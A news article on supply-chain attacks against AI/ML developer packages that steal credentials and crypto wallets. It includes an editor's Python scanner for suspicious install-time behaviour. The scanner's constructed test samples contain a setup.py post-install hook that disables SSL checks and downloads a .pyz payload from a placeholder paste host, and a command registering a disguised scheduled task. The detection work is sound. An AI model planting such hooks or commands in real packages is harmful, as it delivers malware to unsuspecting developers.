Supply-Chain Attacks on AI/ML Developer Tools Expose Crypto Wallets and Credentials

yesterday / 23:46

Key takeaways:

  • Developer-targeted malware may trigger crypto thefts, potentially causing market-wide sell pressure.
  • Watch for abnormal on-chain flows from developer wallets as a sign of compromised assets.
  • The security overlap between AI tools and crypto highlights a growing systemic risk for investors.

A wave of sophisticated supply-chain attacks targeting artificial intelligence and machine learning (AI/ML) developer tools has been uncovered, putting cryptocurrency wallets and sensitive credentials at risk. Microsoft Threat Intelligence revealed that attackers compromised a Mistral AI software package distributed through the Python Package Index (PyPI). The malicious code, automatically executed on Linux systems, downloaded a secondary payload named transformers.pyz that mimicked the widely used Hugging Face Transformers library to blend into development environments. The malware primarily acted as a credential stealer, collecting login information and access tokens, and also included code that could randomly delete files on systems that appeared to be located in Israel or Iran, while avoiding Russian-language systems.

Mistral confirmed it was impacted by a supply-chain attack linked to the broader Shai-Hulud malware campaign, which began in September and targets software supply chains by infecting trusted developer packages. The company stated that an automated worm associated with the attack led to compromised npm and PyPI package versions, but emphasized there was no evidence its own infrastructure was compromised. Reports linked the incident to the open-sourcing of Shai-Hulud, a fully weaponized worm capable of spreading through Git repositories.

In a separate but related incident, a fake OpenAI repository on Hugging Face, pretending to be the legitimate Privacy Filter model, accumulated around 244,000 downloads before being taken down. Security researchers at HiddenLayer discovered the malicious repo under the namespace "Open-OSS/privacy-filter," which instructed users to clone the repository and run scripts. The script disabled SSL verification, fetched commands from a public JSON paste service, and initiated a stealthy infection chain on Windows. It deployed a Rust-based stealer that extracted browser data, Discord tokens, crypto wallet files, SSH and FTP credentials, and VPN details, then exfiltrated the data to a command-and-control server. The malware evaded virtual machines and debuggers, and its final payload was delivered via a scheduled task disguised as a Microsoft Edge updater.
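The two incidents above share a handful of install-time behaviours a reviewer can look for before running anything from an unfamiliar package or repository: SSL verification switched off, commands or payloads fetched from a public paste service, a `.pyz` archive named after a well-known library, a scheduled task registered to look like a browser updater, and `setup.py` logic that runs on `pip install`. The following is an added example from the editor, not code from Microsoft, Mistral, HiddenLayer or any project named in the article. It performs a simple static triage of a checked-out tree with regex heuristics drawn from those behaviours; every sample file, URL and task name in it is constructed, and the rules are review aids rather than signatures for any specific malware.

```python
"""Static triage of an untrusted repository or unpacked package for the
install-time behaviours described in the article. Added example, not code from
Microsoft, Mistral, HiddenLayer or any named project. All samples are constructed."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Heuristic rules derived from the behaviours the article reports. They help a
# human reviewer decide what to read closely; they do not identify any specific sample.
RULES: List[Tuple[str, re.Pattern]] = [
    ("ssl_verification_disabled",
     re.compile(r"verify\s*=\s*False|_create_unverified_context|--no-check-certificate")),
    ("fetches_from_paste_service",
     re.compile(r"https?://[^\s'\"]*paste[^\s'\"]*", re.IGNORECASE)),
    ("downloads_pyz_archive",
     re.compile(r"\b[\w.-]+\.pyz\b")),
    ("scheduled_task_creation",
     re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.IGNORECASE)),
    ("runs_code_at_install_time",
     # a setup.py that overrides the install/develop command runs code on `pip install`
     re.compile(r"cmdclass\s*=|class\s+\w+\s*\(\s*(?:install|develop)\s*\)")),
]

SCANNED_SUFFIXES = {".py", ".sh", ".ps1", ".bat", ".cfg", ".toml", ".md"}


def scan_text(text: str) -> List[str]:
    """Return the names of every rule that matches one file's contents, in rule order."""
    return [name for name, pattern in RULES if pattern.search(text)]


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Walk a checked-out repo or unpacked sdist and map each flagged file to its hits."""
    findings: Dict[str, List[str]] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in SCANNED_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample files: one clean package and one showing the article's red
# flags. The URL, host and task name are placeholders, not real indicators.
CLEAN_SETUP = "from setuptools import setup\nsetup(name='example-clean', version='0.1')\n"

SUSPICIOUS_SETUP = """\
from setuptools import setup
from setuptools.command.install import install
import urllib.request, ssl
class PostInstall(install):
    def run(self):
        ctx = ssl._create_unverified_context()
        urllib.request.urlretrieve('https://paste.example.invalid/raw/PLACEHOLDER', 'transformers.pyz')
        install.run(self)
setup(name='example-suspicious', version='0.1', cmdclass={'install': PostInstall})
"""

SUSPICIOUS_README = """\
# Privacy Filter (constructed sample README)
Run setup.bat after cloning. It registers an updater task:
schtasks /create /tn "EdgeUpdater" /tr "C:\\\\placeholder\\\\run.exe" /sc minute
"""


def triage_sample_repos() -> Dict[str, Dict[str, List[str]]]:
    """Write the constructed samples to a temp dir, scan both, and return findings per repo."""
    results: Dict[str, Dict[str, List[str]]] = {}
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp) / "clean-pkg"
        suspicious = Path(tmp) / "suspicious-pkg"
        clean.mkdir()
        suspicious.mkdir()
        (clean / "setup.py").write_text(CLEAN_SETUP)
        (suspicious / "setup.py").write_text(SUSPICIOUS_SETUP)
        (suspicious / "README.md").write_text(SUSPICIOUS_README)
        results["clean-pkg"] = scan_tree(clean)
        results["suspicious-pkg"] = scan_tree(suspicious)
    return results


if __name__ == "__main__":
    for repo, findings in triage_sample_repos().items():
        print(repo, "->", findings or "no findings")
```

Run it against a real checkout with `scan_tree(Path("path/to/clone"))` before executing any setup script the README asks for; a hit is a reason to read that file by hand, and the clean-package result shows the rules stay quiet on an ordinary `setup.py`.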

These attacks highlight the growing intersection of AI development and crypto-security threats. Developers who ran the malicious scripts risk full compromise of their Windows machines, and security experts recommend immediately isolating affected systems, rotating all credentials stored on them, and moving crypto funds to new wallets created on clean devices. The widespread use of compromised packages through npm and PyPI—platforms with billions of downloads—underscores the risk to the entire blockchain development ecosystem.
